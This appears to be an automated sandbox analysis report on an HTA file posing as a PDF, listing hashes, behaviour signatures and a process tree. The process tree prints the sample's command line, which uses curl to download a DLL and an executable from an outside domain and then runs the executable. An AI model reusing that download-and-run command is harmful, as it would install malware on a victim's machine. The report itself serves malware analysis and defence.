Analysis
-
max time kernel
118s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
09-10-2023 07:29
Static task
static1
Behavioral task
behavioral1
Sample
PDF-25003783999603006904.hta
Resource
win7-20230831-en
windows7-x64
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
PDF-25003783999603006904.hta
Resource
win10v2004-20230915-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
PDF-25003783999603006904.hta
-
Size
10KB
-
MD5
0511f1832cf8b26ae2db6519a434a0dc
-
SHA1
d8193b57e18ccd78ac6e6ba2e4d766bfd5e65962
-
SHA256
1c1106b3c5cdbe492283a89afb11e37186961a5dd6ef08ff59bf6a3cad6bb53e
-
SHA512
a7dd131897b3d82a7d6cdd611edd6c3f777b22636d3497063bb8bf035752affe610e957a9947670059c3b113adbbe30f87a2c3078a46d66f2974502f73ebda1e
-
SSDEEP
192:C6WEg4srZsU4oDnEDzKDy+0/mdJmp0+AVLxd5EwULn5xHV8b0:Cl4sVsU4oDnQAmpAhxxsn3j
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1756 wrote to memory of 3068 1756 mshta.exe 28 PID 1756 wrote to memory of 3068 1756 mshta.exe 28 PID 1756 wrote to memory of 3068 1756 mshta.exe 28 PID 1756 wrote to memory of 3068 1756 mshta.exe 28 PID 3068 wrote to memory of 2584 3068 cmd.exe 30 PID 3068 wrote to memory of 2584 3068 cmd.exe 30 PID 3068 wrote to memory of 2584 3068 cmd.exe 30 PID 3068 wrote to memory of 2584 3068 cmd.exe 30
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PDF-25003783999603006904.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c curl http://hdhsdjjfh.xyz/Lightshot.dll --output C:\GDSDHSGS\Lightshot.dll & cmd.exe /c curl http://hdhsdjjfh.xyz/23756326.exe --output C:\GDSDHSGS\23756326.exe & start C:\GDSDHSGS\23756326.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\cmd.execmd.exe /c curl http://hdhsdjjfh.xyz/23756326.exe --output C:\GDSDHSGS\23756326.exe3⤵PID:2584
-
-